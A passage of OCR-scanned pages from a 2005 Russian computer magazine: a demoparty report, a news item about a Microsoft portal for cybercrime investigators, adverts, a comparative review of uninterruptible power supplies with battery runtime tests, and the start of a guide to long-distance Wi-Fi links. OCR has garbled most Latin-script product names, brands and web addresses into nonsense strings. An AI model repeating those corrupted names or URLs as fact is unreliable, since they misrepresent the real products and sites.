гового комплекса ЛДМ и собрал более 400 посетителей. Ваш по- 
корный тоже успел отметиться. В целом все прошло довольно 
гладко, правда, без приятных сюрпризов, таких как полюбивший- 
ся народу в прошлом году гипнотический квадратик. Номинаций 
было много, помимо стандартных РС/Атіда/2Х-5рес1гит плат- 
форм, авторы представили работы и под мобильные системы. Па- 
раллельно с фестивалем, проходила выставка древних компьюте- 
ров, где можно было поглазеть и даже пощупать таких старичков, 
как Атіда 500, БК001 1 М, Соттобоге 64, Атзігасі Ыоіерасі, ИСКРА- 
1030, УатаИа М5Х-2, АТ&Т ІІІЧІХ РС 7300, ВоЬоІгоп-1715 / СР/М и 
другие экспонаты. Нововведением пати стал семинар, на котором 
сотрудники компании Кепііізи рассказывали о Ыехідеп — новей- 
ших технологиях создания ЗО арта для игр и демо. Также можно бы- 
ло послушать лекции о ЗО-моделировании и разных программерс- 
ких трюках. Чтобы развлечь публику, были приглашены сценовые 
группы МсЫдНІег и СМрСиІІ, исполнившие свои хиты. Не обошлось 
и без Нібсіеп рагіу — тусовки сценеров на открытом воздухе, кото- 
рая в этом году проходила в пригороде Спб недалеко от Ораниен- 
баума. Более подробно о мероприятии можно почитать на сайте 
Ыір://сс5.огд.ги, а большинство работ, участвовавших в разных 
компо, взять на нашем диске. 



МІСКОЗОРТ БУДЕТ 
УЧИТЬ КИБЕРКОПОВ 

На одной из недавних конферен- 
ций, посвященной расследованию 
компьютерных преступлений, 
представитель МісгозоК Ричард 
Ламагна объявил о скором откры- 
тии нового сервиса І_аѵѵ Епіогсетепі 
Рогіаі. Посвящен он будет оказа- 
нию помощи всем, кто посвятил 
себя борьбе с киберпреступ- 
ностью. На сайте можно будет 
найти различные правовые доку- 
ментации, технические статьи, со- 
веты по быстрому обнаружению 
хакеров, полезные антихакерские 
программы и даже тренинги. Лю- 
бой киберкоп сможет через сайт научиться быстро находить нужную 
инфу на диске преступника, отслеживать айпишники и сетевые марш- 
руты, юзать ѵѵііоіз, и другим вещам, которые никогда не помешают, ес- 
ли имеешь дело с хакерами. Как показали опросы и исследования, 
большинство сотрудников органов, работающих в компьютерных отде- 
лах, ничего этого не умеют, но в то же время не против научиться. По- 
мимо предоставления материалов, МісгозоК планирует наладить пря- 
мое сотрудничество с властями и оказывать консультации полицейс- 
ким по вопросам борьбы со взломщиками. Запуск проекта намечен на 
ноябрь, но уже в октябре можно будет пройти тестовый тренинг по 
борьбе с бот-сетями, которые хакеры используют для рассылки рекла- 
мы и ООоЗ-атак. 





Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора ІпЪеІ® РепЪіит® 4 с технологией НТ 





Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора ІпЪеІ® РепЪіит® 4 с технологией НТ. 



и""'", 
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ОЕРО Едо 360 ТѴ: 

• процессоры Іпіеі® РепЬіит® 4 с технологией НТ серии бхх (2Мб сазН второго уровня) 

• чипсет ІпЬеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память 0092 

• новые возможности графики РСІ-Ехргезз 

• реалистичный объемный 8-канальный звук 




Компания йЕРО СотриЪегз Тел./факс: (095) 969-2215, \л/\л/\л/.сіеро.ги 



ІпЬеІ, ІгПеІ Іпзісіе, Ыге I п Р е I Іпзісіе І_одо и ІпЬеІ РепНит являются зарегистрированными товарными знаками ІпЬеІ СогрогаЫоп и её отделе 
М ісгозоІТ и ѴѴІпсІоѵѵз являются зарегистрированными товарными знаками компании МісгозоІТ и её отделений в США и других странах. 



й в США и других странах. 
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ЭНЕРГЕТИЧЕСКАЯ 

НЕЗАВИСИМОСТЬ 



[іпіго] 



Алексеи Шуваев, іезНаЬ пе5НаЬ@аатеІапа.ги 



[технологии] 



[методика тестирования] 




Что ты делаешь, когда сверкает молния, 
выключается свет и соседи начинают ло- 
миться в дверь за свечкой? Выстраиваешь 
баррикады и ждешь начала войны? Не то- 
ропись — подумай о безопасности заранее. 
Сегодня мы поговорим не об интеллекту- 
альной защите твоего компьютера, а о за- 
щите энергетической. Наверняка, ты стал- 
кивался с ситуацией, когда, работая над 
емким и серьезным проектом, неожиданно 
выключался компьютер. Неважно, винова- 
ты ли в этом монтеры, сбой на подстанции 



или замыкание — результат один и тот же 
— данные потеряны. Бороться с проблема- 
ми нестабильности питания призваны Ис- 
точники Бесперебойного Питания — ИБП, 
или, как их еще именуют, ІІР8. В обязан- 
ности ИБП входит не только подпитка 
компьютера в моменты отсутствия тока в 
сети — теперь они выполняют и множе- 
ство других функций. Мы же решили про- 
тестировать наиболее доступные широ- 
кому кругу пользователей устройства в 
ценовом диапазоне до $140 



Внутри ИБП находится аккумулятор, энергия которого используется для работы в автономном ре- 
жиме. Стоит отметить, что не только полное отсутствие напряжения во входной цепи обуславли- 
вает переход в этот режим, но и чрезмерное падение или повышение напряжения также активи- 
зируют режим работы от батарей. Помимо этого, на данный момент, практически все устройства 
умеют защищать локальные сети или телефонные линии от скачков напряжения. 



Тестирование всех устройств производи- 
лось следующим образом. После подклю- 
чения всех ИБП к сети и включения их, на 
подзарядку аккумуляторов давались сутки. 
Набрав полную емкость (в среднем, время 

лючался тестовый стенд, на котором было 
запущено несколько офисных задач таких, 
как текстовый редактор, браузер, проигры- 
вание РіѵХ-фильма и копирование весомо- 
го файла по локальной сети. Там, где поз- 
воляли устройства, производилось подклю- 



[тестовый стенд] 




чение к компьютеру устанавливался соот- 
ветствующий сосртГ" При установлении 
средней загруженности компьютера (такие 
пиковые нагрузки, как постоянное кодиро- 
вание видео не рассматривались) подача 
электроэнергии на ИБП прекращалась, и 
засекалось время до полного отключения 
устройства. В ПО отключались все предуп- 
реждающие надписи и предварительное 
выключение компьютера, чтобы макси- 
мально точно узнать возможное время ра- 
боты от батарей. Ну что ж, тест начался. 



ЫЕС МиШЗупс РЕ791 ЗВ 17 м 

Ерох 8ВРА 

АМР АШІоп ХР 2000+ 

512 Мб 

2хНРР Зеадаіе Ваггасисіа IV 
АТІ Васіеоп 9600 РВО 
РѴР-ВѴѴ ЫЕС 2500 



І'езІЧаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям Аайтхаус (т. (095)689-8603, \ллллл/^д010оизеир5.ги), МЕРЛИОН (\ллллллтегІіоп.ги), 
Аэртон (\ллллл/,аіг!оп.сот), Ыеѵасіа (\ллллл/,пеѵасІа.ги), а также российское представительство компании АРС. 



[ХАКЕР 09 [81] 05 > ' ГЕВВ11М 017 ] 



[ХАКЕР 09 [81] 05 > " РЕВВІІМ 018 ] 



МЮРОЬАВ ІІР5-65СЮ I ЫѲНТНОІІ8Е ВАЗЕ 800 I иѲНТНОІІЗЕ МАЗТЕР 625 
МОЕ ІЧОѴА 600 АѴР I МОЕ ЕШРЗЕ РРЕМЮМ 650 I РСМ ВІЧТ-1000АР 
РРОІЧ ЗМАРТ РРОТЕСТ РРО 700 I АРС ВАСК-ІІР5 ЕЗ 525 



[оІМіпе или ЗіапсІЬу] 



[классы ИБП] 



Все имеющиеся ирз'ы мож- 
но поделить на 3 класса по 
техническим характеристи- 
кам и по области выполняе- 
мых задач. Начнем с само- 
го простого. 



Устройства этого класса на 
рынке распространены бла- 
годаря простоте конструкции 
и невысокой цене. Принцип 
работы довольно прост. Твой 
компьютер напрямую запи- 
тывается от внешней сети, и 
лишь при отсутствии напря- 
жения включается резервное 
питание от батарей. К плю- 
сам можно приписать относи- 
тельную дешевизну и прос- 
тоту в установке и эксплуата- 
ции, что незаменимо в усло- 
виях офиса. К минусам дан- 
ного типа ИБП стоит отнести: 
Ц плохую фильтрацию, вви- 
ду простоты схемы. Выход- 
ное напряжение будет рав- 
няться входному, а это зна- 
чит, что в домах со старой 
проводкой и большим чис- 
лом потребителей возмож- 
но падение до 180В и ниже. 
Нестабильность питания 
негативно скажется на дол- 
говечности всей системы. 
ТІдаже при небольших 
скачках напряжения, уст- 
ройство будет переклю- 
чаться в режим работы от 
аккумуляторов, сокращая 
тем самым их ресурс 
Ц время переходного про- 
цесса «внешняя сеть — ба- 
тареи» может равняться от 
5 до 20 мс. В случае со сту- 
пенчатым падением напря- 
жения время перехода мо- 
жет утраиваться. Чтобы 
цифры не были пустыми, 
скажу, что разогнанная сис- 
тема не терпит переходного 
процесса более 15 мс, так 
что либо снижай скорости, 
либо читай далее. 



[заключение] 



Энергетический кризис может приключиться в любую мину- 
ту, и, чтобы быть готовым к таким неприятностям, приобре- 
тай ИБП. Для себя мы выбрали РСМ ВЫТ-ЮООАР за наи- 
большее время автономной работы и удобство пользования. 
Присудили данному устройству приз «Выбор редакции». 

Ну, а в номинации «Лучшая покупка» почетное место занял 
ЫдІіІІіоизе базе 800, благодаря оптимальному соотношению 
времени автономной работы/цена. 



[Ііпе-Іпіегасііѵе] I [оп-Ыпе] I [*] 



Ко второму типу ИБП отно- 
сятся источники І_іпе- 
Іпіегасііѵе, которые также на- 
зывают гибридными. Прин- 
цип действия аналогичен 
устройствам СШ-І_іпе с до- 
бавлением различных схем, 
призванных компенсировать 
колебания в Сети. Электри- 
ческая схема данных уст- 
ройств сложнее, нежели у 
оТС-Ііпе ИБП. Добавлен мик- 
роконтроллер, призванный 
выполнять мониторинг за 
состоянием всей системы. 
Если устройства зІапсІЬу 
можно представить как акку- 
мулятор с инвертером, то 
данный тип ІІРЗ обладает 
возможностью коммуника- 
ции с компьютером и более 
высокими техническими ха- 
рактеристиками в области 
защиты. Благодаря усложне- 
нию схемы, на выходе полу- 
чается сигнал с аппроксими- 
рованной синусоидой или с 
чистой синусоидой. Как раз 
такие ІІРЗ находятся в на- 
шем ценовом диапазоне, их- 
то мы и протестировали для 
данной статьи. 



Пожалуй, лучшие беспе- 
ребойники из всех имею- 
щихся. Высококачествен- 
ные ИБП класса оп-Ііпе 
имеют так называемую 
гальваническую развязку. 
Главный плюс в том, что 
нагрузка всегда работает 
от аккумулятора (который 
постоянно подзаряжает- 
ся), поэтому время пере- 
хода на батареи, в случае 
отключения электроэнер- 
гии равняется 0! Работает 
схема двойного преобра- 
зования: входящий ток 
преобразуется в постоян- 
ный для зарядки аккуму- 
ляторов, а инвертер, за- 
бирая ток с батарей, пре- 
образует его в перемен- 
ный с напряжением 220В. 
Такие процессы обуслав- 
ливают стабильное пита- 
ние в любое время и наи- 
большую независимость 
от местной электросети, 
за что приходится пла- 
тить меньшим ресурсом 
батарей и большей стои- 
мостью оборудования. 



Заканчивая описание клас- 
сов ИБП, надо сказать об од- 
ной интересной функции, ко- 
торой наделены все данные 
девайсы — Холодный Старт. 
Суть данной технологии поз- 
воляет автономно запиты- 
вать устройства без наличия 
напряжения во входной сети. 
Эта технология поможет тебе 
срочно передать/принять до- 
кумент, распечатать что-то 
срочное или немного поиг- 
рать. Условием холодного за- 
пуска является неполная воз- 
можная нагрузка на устрой- 
ство, как правило, мощность 
стартовой нагрузки колеблет- 
ся от 40 до 80% от макси- 
мальной мощности, выдавае- 
мой ІІРЗ. Подводя итоги, 
можно сказать, что наилуч- 
шей защитой любого элект- 
рического устройства являет- 
ся ИБП класса Оп-Ыпе, как 
обеспечивающий наивыс- 
ший класс защиты и беспере- 
бойное питание нагрузки, но 
по экономическим соображе- 
ниям стоит присмотреться к 
ИБП Ыпе-Іпіегасііѵе, чем мы 
сейчас и займемся. 




місвоиѵв 

II Р 8-650 О 

Тип ИБП: Ыпѳ-Іпіегасііѵе 

Номинальная мощность: 650 ВА / 400 Вт 

Модель батареи: 12 В/ 7А / 1 шт 

Вес: 6,8 кг 

Выходы: 2 х энергонезависимые, 2 х фильтрация напряжения 
Дополнительно: внешний дисплей с информацией: 

загрузка, заряд, перегрузка, зарядка, ошибка 

Защита телефонной линии\І_АІЧ: есть, телефонная линия 
Комплектация: 2 шнура питания, 

телефонный шнур, сот-шнур, софт 

Время работы от батарей: 7:22 



Источник бесперебойного питания, представленный 
МісгоІаЬ, порадовал своим внешним видом. Доволь- 
но большой ЖК-дисплей обещал высокую инфор- 
мативность во время работы. Возможность подклю- 
чения к компьютеру и отслеживание состояния ра- 
боты ИБП не могло не радовать. Установка и наст- 
ройка ПО не заняла много времени. Интерфейс 
программы оказался на русском, что приятно при 
отслеживании ситуации разряда. Индикаторы на 
ЖК-дисплее легко читаемы, благодаря постоянной 
оранжевой подсветке. Среди индикаторов присут- 
ствуют такие, как зарядка, перегрузка, потребляе- 
мая мощность (5 делений) и заряд аккумуляторов (5 
делений). При пропадании внешнего питания, уст- 
ройство известило писком встроенного динамика о 
начале работы от батарей. Отключить неприятный 
сигнал не было возможности, поэтому пришлось 
стойко переносить неприятный звук. Программа 
ІІРВіІоп 2000 позволяет настроить автоматическое 
выключение компьютера, но мы предусмотрительно 
заблокировали эту возможность. Когда индикатор 
заряда батарей достиг 20%, компьютер погас, а 
ЖК-дисплей ИБП высветил ошибку. Время непре- 
рывной работы от батарей составило 7 минут 22 се- 
кунды. Много это или нет — решать тебе. Чтобы 
сохранить все открытые документы и закончить ра- 
боту, этого вполне достаточно, но завершить запись 
ОѴО, если ты только начал прожиг, — может не хва- 
тить. В целом, понравилась информативная панель 
на самом девайсе и русскоговорящий софт — хоро- 
шая модель для офиса и дома, если ты не занима- 
ешься громоздкими операциями, которые нет воз- 
можности резко прекратить. 




І_ідНІІіои8е 
Ьазе 800 

Тип ИБП: І_іпе-1п1егасііѵе 

Номинальная мощность: 800 ВА / 400 Вт 

Модель батареи: 12 В/ 9А / 1 шт 

Вес: 7 кг 

Выходы: 3 х энергонезависимые 

Дополнительно: два светодиодных индикатора 

Защита телефонной линииМ-АІЧ: есть, телефонная линия 
Комплектация: 2 шнура питания, 

телефонный шнур, сот-шнур 

Время работы от батарей: 15:06 



Производитель этих ИБП позиционирует линейку 
□дбібоизе базе как источники для не очень требо- 
вательных систем с диагональю монитора в 17". 
Тестовый стенд, оснащенный монитором ЭЛТ в 17" 
можно считать средней «домашней» рабочей ма- 
шиной. Офисная техника держится примерно на 
том же уровне потребления энергии. Установка и 
подключение ІІРЗ не заняли много времени, обес- 
куражило лишь отсутствие сопутствующего ПО, тем 
более, что коммуникационный кабель в комплект 
входит. Для тех, кто уже имеет данный ИБП или со- 
бирается приобрести, нужно будет зайти на страни- 
цу Шр://ѵѵѵѵѵѵ.ІідМІіоизеирз.ги/ІідМІюи8е_Ьазе и ска- 
чать универсальное ПО. Там же можно ознакомить- 
ся с техническими параметрами всей серии 
□дбібоизе базе. 3 выхода питания позволят подк- 
лючить не только блок компьютера и монитор, но и 
еще какое-либо устройство, будь то принтер или 
сканер, но не стоит подключать лазерные печатаю- 
щие устройства — пиковые нагрузки могут в нес- 
колько раз превышать мощность ИБП. По инструк- 
ции, аккумуляторы данного устройства восстанав- 
ливают 90% своей емкости за 8 часов. Дав устрой- 
ству зарядиться сутки, мы начали испытания. Опять 
же были загружены несколько проигрывателей му- 
зыки и видео, запущены офисные программы и отк- 
лючено внешнее питание. Возможности отключить 
писк звукового индикатора нет, поэтому пришлось 
терпеть и следить за секундомером. Стойко продер- 
жавшись 15 минут и 6 секунд, ИБП отключил наг- 
рузку и оставил горящим индикатор разряженных 
батарей. Хорошее впечатление от работы 
□дбібоизе базе 800 смазало отсутствие ПО в комп- 
лекте, хотя скачать софт с сайта разработчика воз- 
можно, — было бы подключение. 



ИдМІіоизе 
тазіег 625 

Тип ИБП: І_іпе-1п1егас1іѵе 

Номинальная мощность: 625 ВА / 375 Вт 

Модель батареи: 12 В/ 7А / 1 шт 

Вес: 7.5 кг 

Выходы: 2 х энергонезависимые 

Дополнительно: два светодиодных индикатора 

Защита телефонной линииМ-АИ: есть, телефонная линия 
Комплектация: 2 шнура питания, 

телефонный шнур, сот-шнур 

Время работы от батарей: 9:33 



Более продвинутую линейку Источников беспере- 
бойного питания от Ыдбібоизе, представляют два 
устройства серии тазіег. Мы выбрали мощную мо- 
дификацию из представленных. Производитель 
позиционирует данные устройства как ИБП для 
мощных компьютеров или малых серверов. Дан- 
ная серия оснащена защитой от перегрузок и про- 
изводит точную коррекцию входного напряжения. 
«Настоявшись» сутки, аккумуляторы были макси- 
мально заряжены, и мы перешли к подключению. 
Всего два выхода не подразумевают подключения 
дополнительного оборудования, помимо монитора 
и блока. Неудобной показалась кнопка включения 
питания — ее приходится утапливать глубоко, что 
будет неудобно сделать человеку с крупными 
пальцами. Дизайнерское решение внешнего вида 
ИБП вылилось в нечто, что несколько напоминает 
голову Чужого из одноименного фильма. Отсут- 
ствие софта, который вполне можно было вклю- 
чить в комплект, тем более, что коммуникацион- 
ный кабель присутствовал, несколько огорчило. 
Настроив тестовый стенд, ІІРЗ был лишен внеш- 
него питания, и начался замер времени. Отрабо- 
тав чуть больше трех с половиной минут, ИБП 
сдался, и монитор погас. 
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[ХАКЕР 09 [81] 05 > РЕВВІІМ 019 ] 



[ХАКЕР 09 [81] 05 > РЕВВІІМ 020 ] 



МСЕ ІІоѵа 
600 АѴВ 

Тип ИБП: Цпе-Іпіегасііѵе 

Номинальная мощность: 600 ВА / 360 Вт 

Модель батареи: 12 В/ 7.2А / 1 шт 

Вес: 6.8 кг 

Выходы: 3 х энергонезависимые 

Дополнительно: два светодиодных индикатора 

Защита телефонной линииМАІЧ: есть, телефонная линия 
Комплектация: 2 шнура питания, 

телефонный шнур, ЦЗВ- шнур 

Время работы от батарей: 8:12 
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МСЕ еііірзе 

ргетіит 

650 



Тип ИБП: Ыпе-Іпіегасііѵе 



Номинальная мощность: 650 ВА / 420 Вт 
Модель батареи: п/а 



Вес: 9 кг 



Выходы: 4 х энергонезависимые 

Дополнительно: три светодиодных индикатора 
ѵ ^ Защита телефонной линииМАИ: есть, І_АЫ 
Комплектация: 2 шнура питания, 

телефонный шнур, сот- шнур, Ц5В- шнур 



РСМ ВЫТ- 
ІОООАР 

Тип ИБП: Ыпе-Іпіегасііѵе 

Номинальная мощность: 1000 ВА / 600 Вт 

Модель батареи: п/а 

Вес: 13.4 кг 

Выходы: 4 х энергонезависимые, 1х фильтрация 
Дополнительно: один светодиодный индикатор 

Защита телефонной линииМАЫ: есть, І_АЫ 

Комплектация: 2 шнура питания, 

телефонный шнур, сот- шнур, софт 

Время работы от батарей: 29:42 



Подключив блок к сети, мы сразу обнаружили пот- 
ребление энергии. Оказалось, что ИБП обладает 
возможностью подзаряжать аккумуляторы даже в 
выключенном состоянии. Взяв младшую модель из 
линейки (старшая модель на 1100 ВА), мы начали 
тестирование. Подключив устройство к компьютеру, 
задействовав 1)8В-интерфейс, мы установили необ- 
ходимый софт и принялись за работу. Не слишком 
информативное ПО также немногословно, как и сам 
ИБП. Всего два светодиодных индикатора, один из 
которых одновременно обозначает перегрузку и сев- 
шие батареи. Источник имеет три разъема для подк- 
лючения оборудования. В комплект поставки также 
включен телефонный шнур — ИБП умеет защищать 
телефонную линию от скачков напряжения. Зарядив 
аккумуляторы и проверив их емкость при помощи 
ПО, отключили внешнее питание. Переключившись 
на собственные батареи, инвертер ИБП довольно 
шумно начал свою работу. Продержавшись 8 минут 
1 2 секунд, подача энергии устройствам была прекра- 
щена. Не самый лучший результат в тесте, но учиты- 
вая возможность подзарядки батарей даже в выклю- 
ченном состоянии (при условии подключения к ро- 
зетке), можно считать неплохим решением в той 
сфере, где нет необходимости в длительном завер- 
шении процесса работы. 



Время работы от батарей: 21:07 




Один из самых оригинальных ИБП в нашем тесте. Ско- 
рее похожий на игровую приставку, нежели на ІІРЗ, он 
обладает необычным набором функций. Благодаря 
работе дизайнеров, совместно с инженерами, данный 
источник может послужить украшением любого стола. 
Возможно устанавливать его вертикально или гори- 
зонтально. Помимо своих внешних данных, он облада- 
ет отличными техническими характеристиками. Нали- 
чие итерфейсов, подключения к СОМ или ІІЗВ порту, 
приятно радует. Защита локальной сети или телефон- 
ной линии также по плечу данному устройству. Но 
главной изюминкой являются 4 евророзетки, которые 
позволят подключать дМгпЬхісгЬ любые устройства, 
требующие защиты. Кнопка включения служит инди- 
катором активности ИБП. Помимо нее, на корпусе рас- 
положились 3 светодиодных индикатора: перегрузка, 
работа от батарей и севшие аккумуляторы. Програм- 
мное обеспечение, идущее в комплекте, не отличается 
большой функциональностью, но выдает минимум не- 
обходимой информации. Наличие розеток значитель- 
но облегчает подключение других устройств, которые 
тоже стоит оберегать от энергетических сбоев. При ис- 
пытаниях устройство продержалось дольше всех, сре- 
ди ИБП своего «класса» (подразумевается класс мощ- 
ности) — 21 минуту и 7 секунд. 



Самый мощный ИБП в нашем тесте. Наличие всего 
одной кнопки включения питания и одного светоди- 
одного индикатора призвано упростить работу с уст- 
ройством. Доступ к кнопке несколько затруднен нак- 
ладкой вокруг — сделано это для того, чтобы избе- 
жать случайного отключения устройства. Внешний 
осмотр также выявил наличие четырех розеток с пи- 
танием от аккумуляторов, и одной — через фильтр. 
Подключив ИБП к розетке, мы услышали звук, ха- 
рактерный для работающего трансформатора. Ока- 
залось, что данный ИБП обладает возможностью 
заряжаться в выключенном состоянии. Подключив 
все необходимые кабели и установив ІІРЗМоп-прог- 
рамму, идущую в комплекте, начали подготовку 
к тестированию. Запустив весь необходимый софт, 
отключили внешнее питание и перешли на работу от 
батарей. Громкость инвертера, установленного РСМ 
ВІЧТ-ІОООАР дает понять, что рассчитан он на высо- 
копроизводительные системы, которые не призваны 
быть самыми тихими. Проще говоря, самый круп- 
ный, мощный и шумный ИБП в тесте. Показав от- 
личное время почти в 30 минут автономной работы, 
ИБП отключился. Софт, идущий в комплекте, заслу- 
живает отдельного описания. Русскоязычный, 
с большим количеством настроек и индикацией всех 
параметров, он удовлетворит запросы самых взыс- 
кательных пользователей. Возможность построения 
графиков и ведения логов пригодится администра- 
торам. Мощность ИБП позволяет подключить не 
один компьютер к защите. 
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ІРРОЫ 5тагі 
Ргоіесі РВО 
700 

Тип ИБП: Цпе-Іпіегасііѵе 

Номинальная мощность: 700 ВА / 480 Вт 

Модель батареи: п/а 

Вес: 14 кг 

Выходы: 4 х энергонезависимые 

Дополнительно: шесть светодиодных индикаторов 

Защита телефонной линииМ-АІЧ: есть, І_АІЧ или телефон 
Комплектация: 3 шнура питания, 

телефонный шнур, сот- шнур, софт 

Время работы от батарей: 27:25 



Всем своим видом, данный ИБП дает понять, что он 
создан для серьезных людей и призван выполнять 
серьезные задачи. Большой вес устройства и венти- 
ляционные отверстия заставляют задуматься о мес- 
те установки ІРРОЫ ЗтаП Ргоіесі РВО 700. Передняя 
панель оснащена целым блоком светодиодных инди- 
каторов: здесь присутствует как индикатор работы, 
индикатор ошибок, так и набор светодиодов, отобра- 
жающий уровень заряда батарей. Две кнопки — 
включения и управления устройством также распо- 
ложились на передней панели. Задняя панель нам 
открывает 4 защищенные розетки, порт ВЗ-232 и 
вентилятор системы охлаждения. Работает он лишь 
в случаях активного преобразователя тока, что бы- 
вает в случае отключения внешнего питания. Подк- 
лючив все устройства и установив ПО, мы поняли, 
что производитель подошел серьезно ко всему. 
Софт позволяет вести учет происходящего не только 
с данным ИБП, но и с другими — была бы локальная 
сеть. Логи происходящего можно высылать несколь- 
кими путями — в общем, отличный софт для админи- 
стратора большой рабочей группы с серьезными за- 
дачами. Несмотря на разницу 300 ВА в мощности, 
этот ІІРЗ не дотянул до РСМ ВІМТ-ІОООАР всего пару 
минут. Возможность по выбору защищать телефон- 
ную линию или І_АЫ добавляет уважения. Разочаро- 
вал лишь способ подключения — устаревший ВЗ- 
232. Вполне возможно, что на современных маши- 
нах, к которым скорее всего купят данный ИБП, мо- 
жет не оказаться свободного СОМ-порта. 



АРС Васк- 
ІІР5 Е8 525 

Тип ИБП: Цпе-Іпіегасііѵе 

Номинальная мощность: 525 ВА / 300 Вт 

Модель батареи: п/а т ш 

Вес: 7 кг 

Выходы: 3 х энергонезависимые, 1х фильтрация 

Дополнительно: светодиодный индикатор 

Защита телефонной линииМ-АІЧ: есть, телефон 
Комплектация: телефонный шнур, Ц5В- шнур, софт 
Время работы от батарей: 8:18 



ИБП напоминает скорее большой сетевой 
фильтр, нежели Источник Бесперебойного Пи- 
тания. Сменный аккумулятор доступен под 
крышкой на нижней части устройства. На 
верхней расположен выключатель и светоди- 
одный индикатор состояния. 3 защищенные 
розетки и одна розетка с фильтрацией приз- 
ваны сохранять подключенные девайсы. Сто- 
ит обратить внимание — именно розетки, так 
что ты смело можешь подключить хоть пыле- 
сос, если боишься не закончить уборку к возв- 
ращению родителей домой. Защита телефон- 
ной линии также пригодится, если часто в тво- 
ем районе бывают грозы, или ты опасаешься 
саботажников. Подключается устройство по 
шине ІІЗВ, что не может не радовать — все 
компьютеры оснащены данным интерфейсом. 
Софт, идущий в комплекте, довольно инфор- 
мативен и поддерживает русский язык. Пора- 
довала скорость заряда аккумуляторов — при 
полной разрядке, они восстанавливают 95% 
емкости за 4 часа. Небольшое время работы в 
автономном режиме, несколько больше 8 ми- 
нут, можно компенсировать быстрой зарядкой 
— отличный вариант в местах с нестабильным 
питанием. Собрав воедино плюсы и минусы, 
можно сказать, что данное устройство отлич- 
но подходит для защиты не только компьюте- 
ров, но и офисной техники. Основная задача 
АРС Васк-ІІРЗ ЕЗ 525 — дать возможность 
сохранить все документы и отправить факс 
электрикам с претензией о срочном восста- 
новлении электроснабжения. 





Притупились 

мысли? 



заточись на 
\ѵ\ѵ\ѵ*рНепотепІаІ*ги 



Феноментальное решение 

• для концентрации внимания 

• для улучшения памяти 

• для быстрой активации 
умственной деятельности 



Узнай больше на 
\ѵ\ѵ\у*рИепотепІаІ*ги 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІЫІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕНРШМ НЬЮСЫ 
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За тридевять 
земель 

НАША ЗАДАЧА НА СЕГОДНЯ — СВЯЗАТЬ МЕЖ- 
ДУ СОБОЙ ДВА УДАЛЕННЫХ ОБЪЕКТА (ЛО- 
КАЛЬНЫЕ СЕТИ ИЛИ ПРОСТО ОДИНОЧНЫХ 
КЛИЕНТОВ). К СОЖАЛЕНИЮ, ВОЗМОЖНОСТИ 
СЛИНКОВАТЬСЯ НАПРЯМУЮ НЕТ, ТАК КАК 
ЭТОМУ МЕШАЕТ СЛИШКОМ БОЛЬШОЕ РАС- 
СТОЯНИЕ ИЛИ НЕПРЕОДОЛИМОЕ ПРЕПЯТ- 
СТВИЕ (РЕЖИМНЫЙ ОБЪЕКТ И Т.П.). ВАРИАН- 
ТОВ РЕШЕНИЯ ПОСТАВЛЕННОЙ ЗАДАЧИ НЕС- 
КОЛЬКО I Степан Ильин ака 51ер (зІер@геаІ.хакер.ги) 



Руководство 
по поднятию ѴѴі-Рі 
на большом расстоянии 



[связать две сетки] Итак, есть несколь- 
ко вариантов решений этой задачи: 

Щ Подключить оба объекта к высокоскорост- 
ному выделенному каналу и наладить ѴРЫ-со- 
единение. В этом случае каждому придется 
оплачивать абонентку, а в случае использова- 
ния различных провайдеров — отдавать ог- 
ромные деньги за трафик (при работе через 
одного и того же прова трафик считается 
внутресетевым и обычно не тарифицируется). 
С другой стороны, это надежное соединение с 
гарантированной скоростью, ограниченной 
лишь возможностями используемых выделен- 
ных линий. С настройкой такого соединения 
справится любой опытный администратор. 
Справишься и ты, если прочитаешь соответ- 
ствующие статьи в X :). 

\2\ Проложить оптоволокно или медь по кана- 
лизации, воспользовавшись услугами городс- 
ких служб. Дело дорогое и неблагодарное: для 
этого нужно целая куча разрешений, лицензий 
и связей. Хотя такой канал и является идеаль- 
ным вариантом, но для обычных смертных ед- 
ва ли осуществим. Да и влетит это в копеечку, 
как, впрочем, и аренда существующих комму- 
никаций. Оставим этот способ профессиональ- 
ным связистам. 

[з] Связать объекты по радиоканалу. Это требу- 
ет относительно небольших разовых вложе- 
ний, но зато при удачном стечении обстоя- 
тельств выйдет стабильный канал с приличной 
пропускной способностью. К недостаткам мож- 
но отнести необходимость регистрации радио- 
средств в госсвязьнадзоре и получение разре- 
шений на использование частот. Более того, 
скорость передачи данных и потери в канале 
могут сильно зависеть от рельефа местности, 
«загруженности» эфира и погодных условий. 
Гарантировать 100% успех никто не будет, но 
это единственный доступный для нас вариант. 
Его мы и рассмотрим! 




[девайс девайсу — рознь] 

Скажу честно: канитель с ѴѴі-Рі мо- 
жет выйти приличная. И в первую 
очередь это относится к выбору 
подходящего оборудования. На 
рынке представлено огромное 
разнообразие различных ѴѴі-Рі- 
адаптеров, точек доступа, антенн, 
усилителей и прочих примочек, 
произведенных как за границей, 
так и нашими НИИ. И выбор дале- 
ко не всегда очевиден. Попробуй 
сходу скажи, какого усиления ан- 
тенны будет достаточно для уве- 
ренного приема, и какая точка 
доступа лучше справится со свои- 
ми задачами в данной местности. 




В Америке ежегодно про- 
ходят соревнования Оеісоп 
И ПН Вйооіоиі, где каждому 
желающему предоставля- 
ется возможность попро- 
бовать установить И Ѵі-Рі- 
соединение на рекордно 
большом расстоянии. В 
прошлом году эти сорев- 
нования проходили в пус- 
тыне Невада, где трое 
юношей установили связь 
на расстоянии 89(!) км. В 
качестве антенн использо- 
вались обычные спутнико- 
вые тарелки со специаль- 
ными облучателями. 



Трудность заключается еще и в 

том, что девайсы даже одной модели могут быть несколько раз модифи- 
цированы (вплоть до изменения используемого чипсета) и продаваться 
с различными прошивками. Получается, что одна и та же модель иной 
раз ведет себя абсолютно по-разному. Отсюда и идут всевозможные 
споры на форумах, когда один человек утверждает, что поднял стабиль- 
ный линк на расстоянии 2 км, а другой удивляется, почему те же карточ- 
ки отвратно работают даже на одном столе. Попробуем разобраться, ка- 
кое именно оборудование нам необходимо. 



[беспроводные адаптеры] Это самое примитивное ѴѴі-Рі-устрой- 
